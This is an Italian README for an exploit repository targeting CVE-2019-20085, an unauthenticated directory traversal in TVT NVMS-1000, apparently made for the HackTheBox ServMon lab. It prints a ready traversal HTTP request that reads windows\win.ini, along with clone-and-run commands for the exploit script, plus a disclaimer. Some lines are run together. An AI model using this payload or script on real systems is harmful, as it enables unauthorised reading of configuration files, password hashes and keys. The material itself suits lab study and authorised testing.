
Un repository utilizzato per la macchina ServMon di Hackthebox.
Autore: Z3R0 CVE: CVE-2019-20085 Bersaglio: TVT NVMS-1000 (tutte le versioni note precedenti alla patch) Tipo di vulnerabilità: Directory Traversal senza autenticazione Data: [Inserisci la tua data di rilascio]
Il software NVMS-1000 di TVT contiene una vulnerabilità di directory traversal nel componente del server web. Inviando una richiesta GET appositamente costruita con sequenze /.., un attaccante non autenticato può accedere a file arbitrari del sistema operativo sottostante, inclusi file di configurazione sensibili, hash di password o chiavi di sistema.
Questo exploit sfrutta la risoluzione vulnerabile dei percorsi file nel server HTTP in esecuzione su NVMS-1000. Non è richiesta alcuna autenticazione. Un attaccante remoto può leggere qualsiasi file accessibile all'utente del servizio.
GET /..%5C..%5C..%5C..%5Cwindows%5Cwin.ini HTTP/1.1
Host: <target-ip>:80
C:\Windows\win.ini)requests (pip install requests)git clone https://github.com/Z3R0-0x30/CVE-2019-20085.git
cd CVE-2019-20085
python3 exploit.py http://domain.local/ ../../windows/win.ini win.ini"
Questo exploit è rilasciato esclusivamente per scopi educativi e di ricerca sulla sicurezza autorizzata. L'autore Z3R0 non è responsabile per qualsiasi uso improprio o accesso non autorizzato. Ottieni sempre la dovuta autorizzazione prima di testare i sistemi.